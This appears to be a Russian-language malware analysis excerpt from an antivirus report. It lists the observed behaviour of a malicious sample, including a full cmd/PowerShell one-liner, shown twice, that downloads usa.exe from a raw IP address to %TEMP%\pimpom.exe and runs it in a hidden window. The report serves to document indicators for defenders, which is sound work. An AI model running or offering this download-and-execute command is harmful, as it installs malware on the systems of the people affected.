Техническая информация
- http://82.146.58.146/originalexe/usa.exe как %temp%\pimpom.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://82.146.58.146/originalexe/usa.exe','%TEMP%\pimpom.exe');Start-Process '%TEMP%\pimpom.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1936
- %TEMP%\1446909.cvr
- '82.##6.58.146':80
- http://82.##6.58.146/originalexe/usa.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://82.146.58.146/originalexe/usa.exe','%TEMP%\pimpom.exe');Start-Process '%TEMP%\pimpom.exe';' (со скрытым окном)